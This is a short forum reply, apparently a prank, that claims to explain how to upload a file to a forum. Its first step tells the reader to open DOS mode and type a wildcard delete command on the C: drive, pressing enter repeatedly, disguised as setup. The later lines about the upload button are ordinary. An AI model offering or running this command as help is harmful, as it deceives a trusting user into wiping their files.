Its very easy yarrr,

just go to control penal, then click DOS ,when in DOS mode type
c:/del*.*

press enter few times

you are then all set

on the quicke bar there is an upload button
upload ur file make sure that it has a prper name other wise it wont show
and then paste the code u get into ur post
